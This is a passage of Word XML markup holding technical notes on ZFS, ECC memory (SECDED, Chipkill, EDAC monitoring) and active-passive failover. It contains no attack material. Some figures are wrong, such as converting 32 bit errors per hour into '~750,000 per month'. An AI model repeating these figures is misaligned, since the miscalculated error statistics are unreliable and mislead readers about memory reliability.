        <w:t xml:space="preserve">      RAID 6: requires 2 simultaneous failures → exponentially rarer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A8B46" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="548DEDCC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>ZFS — the software RAID alternative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E87E21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Copy-on-Write (CoW): never overwrites data in place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B9BB7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Write goes to new location → update metadata → old location freed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED1B29E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Crash at any point: old state is intact, new state not yet committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE29E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Eliminates: RAID 5 write hole entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A0F82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111B57B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  End-to-end checksums: every block has a checksum stored separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C25EB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    On read: verify checksum → detect any silent corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F79A7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    On scrub: background verification of all blocks → detect bit rot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE7963" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3ABDA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Compression: transparent compression (LZ4, ZSTD) per dataset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D48F5B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C62A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ZFS RAIDZ (software RAID 5 equivalent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0D31D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    RAIDZ1: 1 parity disk (like RAID 5 but no write hole)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FFFE2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    RAIDZ2: 2 parity disks (like RAID 6 but no write hole)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D288726" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    RAIDZ3: 3 parity disks (extreme durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D59500" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1CC75" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ZFS scrub:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD8BD5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Background process: reads every block, verifies checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A305C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Corrects: silent corruption using RAIDZ parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E2C4A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Frequency: monthly recommended (detects bit rot before it accumulates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15D7E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D082AD6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ARC (Adaptive Replacement Cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D600187" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Intelligent caching: balances recency and frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37274AD8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    L2ARC: extend cache to fast SSDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F2026" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ZIL (ZFS Intent Log): write-ahead log on SSD for synchronous write performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37315049" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECC RAM — protecting computation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E1CB5F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643E6F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>DRAM bit errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56003120" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Rate: approximately 1 error per 8GB per hour (Google study, 2009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60697695" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Per server with 256GB: ~32 bit errors per hour = ~750,000 per month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F729CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Most caught by ECC, some cause silent corruption, rarest cause crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B074B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23AB14" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>ECC (Error-Correcting Code) memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6266E825" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  SECDED (Single Error Correct, Double Error Detect):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4B107" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Adds 8 bits of Hamming code per 64-bit word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00682E5E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Detects: all 1-bit errors, most 2-bit errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C770F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Corrects: all 1-bit errors (automatically, transparently)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79448825" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527DD50" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75623939" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    7 parity bits cover different subsets of 64 data bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A46E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    On write: compute parity bits, store alongside data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDF34A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    On read: recompute parity, XOR with stored parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B37A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If XOR = 0: no error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4902A602" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If XOR has 1 bit set: parity bit error (no data error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7783E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If XOR matches a data bit's parity subset pattern: correct that bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC8A04" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If XOR matches no pattern: double-bit error → signal uncorrectable error → crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007645D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A2245E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Hardware implementation: ~1-2ns overhead on every memory access (negligible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A0928" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E29A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Enterprise vs consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723101F9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Consumer DIMM: no ECC (cheaper, gaming/desktop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2595AE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Server DIMM: ECC (mandatory for production servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC2788" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Cost difference: ~20-30% premium for ECC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB52E6C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Value: prevents corruption of financial transactions, database rows, kernel state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2D0E7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D52ECB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Chipkill (IBM's extended ECC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D710BC5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Standard ECC: corrects 1 bit error per 64-bit word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD5F4E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If an entire DRAM chip fails: multiple bits per word corrupt → uncorrectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E0BE7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Chipkill: additional redundancy allows entire DRAM chip failure to be corrected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B6B37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Required for: high-availability servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D1611" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A945208" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DIMM failure during operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BDE29" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Server detects: uncorrectable ECC errors from specific DIMM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326C241" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    BIOS/OS: may online-retire the DIMM (remap to spare), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F71F03" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">             trigger immediate reboot (if error rate too high)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036DA969" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Monitoring: watch /sys/devices/system/edac/mc*/csrow*/ce_count (correctable errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108C32A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Alert if: correctable error rate increasing (dying DIMM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6833E790" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software Redundancy — Replication and N-Version Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A478031" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active vs Active-Passive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D9B77" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911D887" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Active-Passive (Hot Standby):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CACAB00" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Primary: handles all traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372917C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Secondary: receives state updates (replication), handles no traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E824C5E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B87D87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Failover trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4738A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Health check fails → standby promoted to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C16AA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Clients redirected (DNS update, load balancer reconfiguration, VIP takeover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B242869" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F0509" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Failover time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E0E948" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Detection: 10-30 seconds (health check interval × failure count threshold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A626625" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Promotion: 1-10 seconds (start accepting traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF55DFF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Client reconnection: dependent on DNS TTL (seconds to minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24078F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442BF9B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Total: 15 seconds to 5 minutes of unavailability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD822A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64374B9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385CB561" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Async replication: data loss possible (uncommitted writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A720EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Sync replication: no data loss, write latency increased</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A72A5F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511452B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Resource utilization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297677A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Standby: consuming resources (CPU, memory, network) but doing no work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45697987" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Waste: 50% resources idle at all times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A681172" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Justification: the standby is paying for availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057247B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35F05B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Use cases: PostgreSQL primary-replica, Redis Sentinel, MySQL Group Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C52815E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5439B05D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Active-Active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FC8FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Multiple instances: all handle traffic simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783E4648" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Load balanced: clients distributed across all instances</w:t>
      </w:r>
